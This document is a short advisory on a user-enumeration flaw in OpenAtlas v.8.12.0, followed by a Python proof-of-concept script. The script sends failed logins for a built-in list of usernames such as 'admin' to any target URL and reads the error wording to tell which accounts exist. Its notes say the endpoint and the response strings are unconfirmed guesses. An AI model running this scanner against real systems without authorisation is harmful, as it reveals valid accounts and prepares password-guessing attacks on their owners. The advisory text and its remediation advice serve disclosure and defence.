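An issue in Austrian Academy of Sciences (AW) Austrian Archaeological Institute OpenAtlas v.8.12.0 allows a remote attacker to obtain sensitive information via the login error messages. The information at stake is whether a given username exists: a login form that answers an unknown username differently from a wrong password lets a client tell the two cases apart. On the application side, the remedy is to return one identical response for both failures and to throttle repeated failed logins.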
The following code is for security research and authorized testing only.
python
import requests
import sys
# CVE-2025-56423 PoC - OpenAtlas User Enumeration
# Target: OpenAtlas v.8.12.0
# Vulnerability: User enumeration via login error messages
def check_user_exists(target_url, username):
    """Classify one username from the wording of a failed-login response.

    Sends a single login attempt with a fixed wrong password and looks for
    fixed substrings in the lower-cased response body.

    Returns:
        False if the body contains an "unknown user" marker,
        True if it contains a "wrong password" marker,
        None if neither marker appears or the request failed.

    NOTE(review): the endpoint path and all four marker strings are
    hard-coded guesses in this script; nothing here confirms they match
    what OpenAtlas actually returns. A None result therefore means
    "inconclusive", not "not affected". A server that answers both failure
    cases with the same text always yields None, which is the behaviour a
    fix should produce.
    """
    # Path is an assumption of the script; adjust endpoint as needed.
    endpoint = f"{target_url}/user/login"
    form = {
        'username': username,
        'password': 'random_wrong_password_123',
    }

    try:
        # Every call is a real failed login and will appear in the
        # application's authentication log.
        body = requests.post(endpoint, data=form, timeout=10).text.lower()
    except requests.exceptions.RequestException as e:
        print(f"Error: {e}")
        return None

    unknown_user_markers = ('user not found', 'username does not exist')
    wrong_password_markers = ('incorrect password', 'wrong password')

    # The "unknown user" markers are checked first, as in the original.
    if any(marker in body for marker in unknown_user_markers):
        return False
    if any(marker in body for marker in wrong_password_markers):
        return True
    # Neither wording seen: the responses do not distinguish the two cases
    # (or use wording this script does not know about).
    return None
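def main():
    """Check a short built-in username list against one target and summarise.

    Expects exactly one command-line argument, the target base URL; prints
    usage and exits with status 1 otherwise.

    Each username is passed to check_user_exists(), whose result is
    True (exists), False (does not exist) or None (inconclusive). The
    original loop silently dropped None results, so a run in which every
    request failed or every response was unrecognised ended with
    "No valid users found", which reads like a clean result. Inconclusive
    checks are now listed and counted so that the summary cannot be mistaken
    for evidence that the target is unaffected.

    Every check is a failed login against the target: on the server side a
    run shows up as a burst of failed logins for different usernames from a
    single source.
    """
    if len(sys.argv) != 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com")
        sys.exit(1)

    target = sys.argv[1]
    usernames = ['admin', 'user', 'test', 'administrator', 'guest']
    print(f"[*] Scanning {target} for valid usernames...")
    print("-" * 50)

    found_users = []
    inconclusive = []
    for user in usernames:
        result = check_user_exists(target, user)
        if result is True:
            print(f"[+] User found: {user}")
            found_users.append(user)
        elif result is False:
            print(f"[-] User not found: {user}")
        else:
            # None: request error, or the response matched no known marker.
            print(f"[?] Inconclusive: {user}")
            inconclusive.append(user)

    print("-" * 50)
    if found_users:
        print(f"[*] Found {len(found_users)} valid user(s): {', '.join(found_users)}")
    else:
        print("[*] No valid users found")
    if inconclusive:
        print(f"[!] {len(inconclusive)} check(s) inconclusive: {', '.join(inconclusive)}")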
# Run the scan only when executed as a script, not when imported.
if __name__ == "__main__":
    main()